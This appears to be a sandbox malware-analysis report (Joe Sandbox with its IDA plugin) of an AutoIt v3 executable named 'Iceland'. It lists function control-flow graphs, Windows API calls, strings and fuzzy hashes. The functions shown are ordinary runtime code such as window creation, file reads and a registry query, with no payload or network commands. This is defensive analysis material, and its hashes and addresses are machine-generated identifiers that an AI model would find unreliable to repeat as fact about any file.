                                                                                                                                                                                                                                                                control_flow_graph 577 a2370f-a23724 578 a23726-a23729 577->578 579 a23784-a23786 577->579 581 a2378a 578->581 582 a2372b-a23732 578->582 579->578 580 a23788 579->580 583 a2376f-a23777 DefWindowProcW 580->583 584 a63df4-a63e1c call a22f92 call a3f23c 581->584 585 a23790-a23795 581->585 586 a23804-a2380c PostQuitMessage 582->586 587 a23738-a2373d 582->587 588 a2377d-a23783 583->588 619 a63e21-a63e28 584->619 590 a23797-a2379a 585->590 591 a237bc-a237e3 SetTimer RegisterWindowMessageW 585->591 589 a237b8-a237ba 586->589 592 a23743-a23747 587->592 593 a63e61-a63e75 call a8c8f7 587->593 589->588 595 a237a0-a237b3 KillTimer call a23907 call a259ff 590->595 596 a63d95-a63d98 590->596 591->589 597 a237e5-a237f0 CreatePopupMenu 591->597 598 a2380e-a23818 call a3fcad 592->598 599 a2374d-a23752 592->599 593->589 610 a63e7b 593->610 595->589 604 a63dd0-a63def MoveWindow 596->604 605 a63d9a-a63d9e 596->605 597->589 612 a2381d 598->612 607 a63e46-a63e4d 599->607 608 a23758-a2375d 599->608 604->589 613 a63da0-a63da3 605->613 614 a63dbf-a63dcb SetFocus 605->614 607->583 616 a63e53-a63e5c call a81423 607->616 617 a237f2-a23802 call a2381f 608->617 618 a23763-a23769 608->618 610->583 612->589 613->618 620 a63da9-a63dba call a22f92 613->620 614->589 616->583 617->589 618->583 618->619 619->583 625 a63e2e-a63e41 call a23907 call a2396b 619->625 620->589 625->583
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A23709,?,?), ref: 00A23777
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00A23709,?,?), ref: 00A237A3
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A237C6
                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A23709,?,?), ref: 00A237D1
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00A237E5
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00A23806
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                • Opcode ID: 8998b20be849a18703f9a0c049d093f984255e99bf32c2f29359e47a4a2f41b6
                                                                                                                                                                                                                                                                • Instruction ID: 2e69e23bcb05dfbb7c7b095555e3daf1f0ee18cc57d0f04761675635e00923c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8998b20be849a18703f9a0c049d093f984255e99bf32c2f29359e47a4a2f41b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 604106F3640265BBDF14EBECAD59BB93A76E742300F000235F5028A1A1DABD9B46D761
                                                                                                                                                                                                                                                                Function 00A590C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 633 a590c5-a590d5 634 a590d7-a590ea call a4f636 call a4f649 633->634 635 a590ef-a590f1 633->635 653 a59471 634->653 636 a590f7-a590fd 635->636 637 a59459-a59466 call a4f636 call a4f649 635->637 636->637 639 a59103-a5912e 636->639 654 a5946c call a52b5c 637->654 639->637 642 a59134-a5913d 639->642 645 a59157-a59159 642->645 646 a5913f-a59152 call a4f636 call a4f649 642->646 651 a59455-a59457 645->651 652 a5915f-a59163 645->652 646->654 655 a59474-a59479 651->655 652->651 657 a59169-a5916d 652->657 653->655 654->653 657->646 660 a5916f-a59186 657->660 662 a591a3-a591ac 660->662 663 a59188-a5918b 660->663 664 a591ae-a591c5 call a4f636 call a4f649 call a52b5c 662->664 665 a591ca-a591d4 662->665 666 a59195-a5919e 663->666 667 a5918d-a59193 663->667 696 a5938c 664->696 669 a591d6-a591d8 665->669 670 a591db-a591dc call a53b93 665->670 671 a5923f-a59259 666->671 667->664 667->666 669->670 679 a591e1-a591f9 call a52d38 * 2 670->679 673 a5932d-a59336 call a5fc1b 671->673 674 a5925f-a5926f 671->674 685 a593a9 673->685 686 a59338-a5934a 673->686 674->673 678 a59275-a59277 674->678 678->673 682 a5927d-a592a3 678->682 700 a59216-a5923c call a597a4 679->700 701 a591fb-a59211 call a4f649 call a4f636 679->701 682->673 687 a592a9-a592bc 682->687 689 a593ad-a593c5 ReadFile 685->689 686->685 691 a5934c-a5935b GetConsoleMode 686->691 687->673 692 a592be-a592c0 687->692 694 a593c7-a593cd 689->694 695 a59421-a5942c GetLastError 689->695 691->685 697 a5935d-a59361 691->697 692->673 698 a592c2-a592ed 692->698 694->695 704 a593cf 694->704 702 a59445-a59448 695->702 703 a5942e-a59440 call a4f649 call a4f636 695->703 706 a5938f-a59399 call a52d38 696->706 697->689 705 a59363-a5937d ReadConsoleW 697->705 698->673 707 a592ef-a59302 698->707 700->671 701->696 715 a59385-a5938b call a4f613 702->715 716 a5944e-a59450 702->716 703->696 712 a593d2-a593e4 704->712 713 a5937f GetLastError 705->713 714 a5939e-a593a7 705->714 706->655 707->673 708 a59304-a59306 707->708 708->673 719 a59308-a59328 708->719 712->706 723 a593e6-a593ea 712->723 713->715 714->712 715->696 716->706 719->673 727 a59403-a5940e 723->727 728 a593ec-a593fc call a58de1 723->728 733 a59410 call a58f31 727->733 734 a5941a-a5941f call a58c21 727->734 739 a593ff-a59401 728->739 740 a59415-a59418 733->740 734->740 739->706 740->739
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d2f66c1c0e102f552f1314305b6e7efd405ecc455d9ef4f11c30f95d18b6e321
                                                                                                                                                                                                                                                                • Instruction ID: 006c5ad1185313b6bb79b60eb72c30598d3d7956034e050cd8e696e91796e920
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2f66c1c0e102f552f1314305b6e7efd405ecc455d9ef4f11c30f95d18b6e321
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC1CE74A04289EFDF11DFE9D841BAEBBB4BF49311F184159E814AF292C7309D4ACB61
                                                                                                                                                                                                                                                                Function 00A3AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 741 a3ac3e-a3b063 call a28ec0 call a3bc58 call a2e6a0 748 a78584-a78591 741->748 749 a3b069-a3b073 741->749 752 a78596-a785a5 748->752 753 a78593 748->753 750 a3b079-a3b07e 749->750 751 a7896b-a78979 749->751 754 a785b2-a785b4 750->754 755 a3b084-a3b090 call a3b5b6 750->755 758 a7897e 751->758 759 a7897b 751->759 756 a785a7 752->756 757 a785aa 752->757 753->752 763 a785bd 754->763 755->763 766 a3b096-a3b0a3 call a2c98d 755->766 756->757 757->754 761 a78985-a7898e 758->761 759->758 764 a78993 761->764 765 a78990 761->765 767 a785c7 763->767 768 a7899c-a789eb call a2e6a0 call a3bbbe * 2 764->768 765->764 774 a3b0ab-a3b0b4 766->774 772 a785cf-a785d2 767->772 803 a3b1e0-a3b1f5 768->803 804 a789f1-a78a03 call a3b5b6 768->804 775 a3b158-a3b16f 772->775 776 a785d8-a78600 call a44cd3 call a27ad5 772->776 778 a3b0b8-a3b0d6 call a44d98 774->778 781 a78954-a78957 775->781 782 a3b175 775->782 816 a78602-a78606 776->816 817 a7862d-a78651 call a27b1a call a2bd98 776->817 797 a3b0e5 778->797 798 a3b0d8-a3b0e1 778->798 786 a78a41-a78a79 call a2e6a0 call a3bbbe 781->786 787 a7895d-a78960 781->787 788 a788ff-a78920 call a2e6a0 782->788 789 a3b17b-a3b17e 782->789 786->803 847 a78a7f-a78a91 call a3b5b6 786->847 787->768 794 a78962-a78965 787->794 788->803 821 a78926-a78938 call a3b5b6 788->821 795 a3b184-a3b187 789->795 796 a78729-a78743 call a3bbbe 789->796 794->751 794->803 805 a786ca-a786e0 call a26c03 795->805 806 a3b18d-a3b190 795->806 826 a7888f-a788b5 call a2e6a0 796->826 827 a78749-a7874c 796->827 797->767 809 a3b0eb-a3b0fc 797->809 798->778 807 a3b0e3 798->807 811 a3b1fb-a3b20b call a2e6a0 803->811 812 a78ac9-a78acf 803->812 838 a78a05-a78a0d 804->838 839 a78a2f-a78a3c call a2c98d 804->839 805->803 836 a786e6-a786fc call a3b5b6 805->836 819 a78656-a78659 806->819 820 a3b196-a3b1b8 call a2e6a0 806->820 807->809 809->751 810 a3b102-a3b11c 809->810 810->772 823 a3b122-a3b154 call a3bbbe call a2e6a0 810->823 812->774 829 a78ad5 812->829 816->817 831 a78608-a7862b call a2ad40 816->831 817->819 819->751 824 a7865f-a78674 call a26c03 819->824 820->803 855 a3b1ba-a3b1cc call a3b5b6 820->855 858 a78945 821->858 859 a7893a-a78943 call a2c98d 821->859 823->775 824->803 877 a7867a-a78690 call a3b5b6 824->877 826->803 880 a788bb-a788cd call a3b5b6 826->880 845 a787bf-a787de call a2e6a0 827->845 846 a7874e-a78751 827->846 829->751 831->816 831->817 883 a786fe-a7870b call a28ec0 836->883 884 a7870d-a78716 call a28ec0 836->884 853 a78a0f-a78a13 838->853 854 a78a1e-a78a29 call a2b4b1 838->854 890 a78ac2-a78ac4 839->890 845->803 882 a787e4-a787f6 call a3b5b6 845->882 861 a78757-a78774 call a2e6a0 846->861 862 a78ada-a78ae8 846->862 894 a78ab5-a78abe call a2c98d 847->894 895 a78a93-a78a9b 847->895 853->854 870 a78a15-a78a19 853->870 854->839 902 a78b0b-a78b19 854->902 903 a3b1d2-a3b1de 855->903 904 a786ba-a786c3 call a2c98d 855->904 876 a78949-a7894f 858->876 859->876 861->803 906 a7877a-a7878c call a3b5b6 861->906 868 a78aed-a78afd 862->868 869 a78aea 862->869 885 a78b02-a78b06 868->885 886 a78aff 868->886 869->868 887 a78aa1-a78aa3 870->887 876->803 919 a78692-a7869b call a2c98d 877->919 920 a7869d-a786ab call a28ec0 877->920 910 a788cf-a788dc call a2c98d 880->910 911 a788de 880->911 882->803 926 a787fc-a78805 call a3b5b6 882->926 927 a78719-a78724 call a28577 883->927 884->927 885->811 886->885 887->803 890->803 894->890 907 a78a9d 895->907 908 a78aa8-a78ab3 call a2b4b1 895->908 916 a78b1e-a78b21 902->916 917 a78b1b 902->917 903->803 904->805 938 a7879f 906->938 939 a7878e-a7879d call a2c98d 906->939 907->887 908->894 908->902 925 a788e2-a788e9 910->925 911->925 916->761 917->916 945 a786ae-a786b5 919->945 920->945 932 a788f5 call a23907 925->932 933 a788eb-a788f0 call a2396b 925->933 951 a78807-a78816 call a2c98d 926->951 952 a78818 926->952 927->803 950 a788fa 932->950 933->803 940 a787a3-a787ae call a49334 938->940 939->940 940->751 956 a787b4-a787ba 940->956 945->803 950->803 955 a7881c-a7883f 951->955 952->955 958 a78841-a78848 955->958 959 a7884d-a78850 955->959 956->803 958->959 960 a78852-a7885b 959->960 961 a78860-a78863 959->961 960->961 962 a78865-a7886e 961->962 963 a78873-a78876 961->963 962->963 963->803 964 a7887c-a7888a 963->964 964->803
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                • Opcode ID: 4321b94245546c348804793b8797fa5d1e722a65a6e0ebe07cf40cc32583ca8b
                                                                                                                                                                                                                                                                • Instruction ID: a657b3fa46a2c743109ecde60aaeeeb5ed142c5609c6ac0790bba04880ea906a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4321b94245546c348804793b8797fa5d1e722a65a6e0ebe07cf40cc32583ca8b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F624870508341CFC728DF28C598AAABBE1FF88344F10896EE5998B352DB71D945CF92
                                                                                                                                                                                                                                                                Function 00A235B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1001 a235b3-a23623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A235E1
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23602
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A23616
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A2361F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                • Opcode ID: 34b36b47fa3438d2862df00ced324a20ef47d1db4bac771f9f3e618e54911fe9
                                                                                                                                                                                                                                                                • Instruction ID: 0b04a2c7be3655367f21545e19bf3dc72af7e3063279079d4db9b46082abce6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34b36b47fa3438d2862df00ced324a20ef47d1db4bac771f9f3e618e54911fe9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4F03AB56002957AE7318B936C0DFB73EBDE7C6F50B00012EB904AB160D6690882DBB0
                                                                                                                                                                                                                                                                Function 00A261A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A65287
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A26299
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                • String ID: Line %d: $AutoIt - $]]
                                                                                                                                                                                                                                                                • API String ID: 2289894680-740035790
                                                                                                                                                                                                                                                                • Opcode ID: d704a92cdac3f148e878050ddf8cfa3d1b40548a04d223efa1d6b3bedcf5dfc4
                                                                                                                                                                                                                                                                • Instruction ID: 2072e270e48a13082081ce93760b89b42b32c5065ddefed06ab62231445902dc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d704a92cdac3f148e878050ddf8cfa3d1b40548a04d223efa1d6b3bedcf5dfc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D41A271809324AAC311EBA4ED45FEF7BECAF54310F004A2EF595920A1EB349A49C792
                                                                                                                                                                                                                                                                Function 00A2663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1053 a2663e-a26654 LoadLibraryA 1054 a26656-a26664 GetProcAddress 1053->1054 1055 a26674-a26678 1053->1055 1056 a26666 1054->1056 1057 a26669-a2666b 1054->1057 1056->1057 1057->1055 1058 a2666d-a2666e FreeLibrary 1057->1058 1058->1055
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2664A
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A2665C
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2666E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                • Opcode ID: 411c8a201fc74c7b33c1501a54153335b911b365bee9e336ab8bb2a767e1098c
                                                                                                                                                                                                                                                                • Instruction ID: 1178c1d1ee87d726b71dbdd378c9414cd72ffe6435d790a82807e5db50ca5560
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 411c8a201fc74c7b33c1501a54153335b911b365bee9e336ab8bb2a767e1098c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBE08636A02632279216176DBC08B9A652D9F82B12F050335F800D2114EB54CC0380A4
                                                                                                                                                                                                                                                                Function 00A258CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1059 a258cb-a258d6 1060 a25948-a2594a 1059->1060 1061 a258d8-a258dd 1059->1061 1062 a2593b-a2593e 1060->1062 1061->1060 1063 a258df-a258f7 RegOpenKeyExW 1061->1063 1063->1060 1064 a258f9-a25918 RegQueryValueExW 1063->1064 1065 a2591a-a25925 1064->1065 1066 a2592f-a2593a RegCloseKey 1064->1066 1067 a25927-a25929 1065->1067 1068 a2593f-a25946 1065->1068 1066->1062 1069 a2592d 1067->1069 1068->1069 1069->1066
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A258BE,SwapMouseButtons,00000004,?), ref: 00A258EF
                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A258BE,SwapMouseButtons,00000004,?), ref: 00A25910
                                                                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A258BE,SwapMouseButtons,00000004,?), ref: 00A25932
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                • Opcode ID: c86bf9466bf50455d90a8e95f7056e9fbb1346720cfae42429167cc61e77fdf0
                                                                                                                                                                                                                                                                • Instruction ID: 087f1f1c182e7ace6bb7fffa2f68f5d49ef36c0a93aa63f2035846bcf2d478cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c86bf9466bf50455d90a8e95f7056e9fbb1346720cfae42429167cc61e77fdf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC117C75910628FFDB21DFA8EC80EAE77B8FF00760F104529F802E7210E2319E8197A0
                                                                                                                                                                                                                                                                Function 00A2F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Variable must be of type 'Object'., xrefs: 00A748C6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                • API String ID: 0-109567571
                                                                                                                                                                                                                                                                • Opcode ID: dd6875e6cbef31fd3bc3553586ed788cdc9c3bb345ad2b5362a19a4bcc45c14c
                                                                                                                                                                                                                                                                • Instruction ID: 0b1cf48020cdfa531cbe9cf15cc94810c41ffd144369e9e1c576dadd969a1d25
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd6875e6cbef31fd3bc3553586ed788cdc9c3bb345ad2b5362a19a4bcc45c14c
